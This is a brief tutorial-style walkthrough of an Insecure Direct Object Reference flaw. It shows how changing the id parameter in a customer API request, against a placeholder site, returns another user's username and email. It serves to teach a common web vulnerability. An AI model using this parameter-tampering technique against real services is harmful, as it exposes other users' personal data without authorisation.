Insecure Direct Object Reference
Your AccountSection gives us the ability to change our Information such as Username - Email - Password. [We notice the Username & Email fields Pre-Filled in with our Information]- Refreshing the Page and going to the
Network Tabin theBrowser Toolswe see a Call to an Endpoint. - Endpoint PATH:
/api/v1/customer?id={user_id}
- Refreshing the Page and going to the
{id: 15, username: "delaila", email: "delaila@email.com"}
email: "delaila@email.com"
id: 15
username: "delaila"
- Changing ID:
3
┌──────────────────────────────────────────┐ ┌────────────────────────────────────────────────────┐
| https://website.com/api/v1/customer?id=3 | -► | {id: 3, username: "jack", email: "jack@email.com"} |
└──────────────────────────────────────────┘ └────────────────────────────────────────────────────┘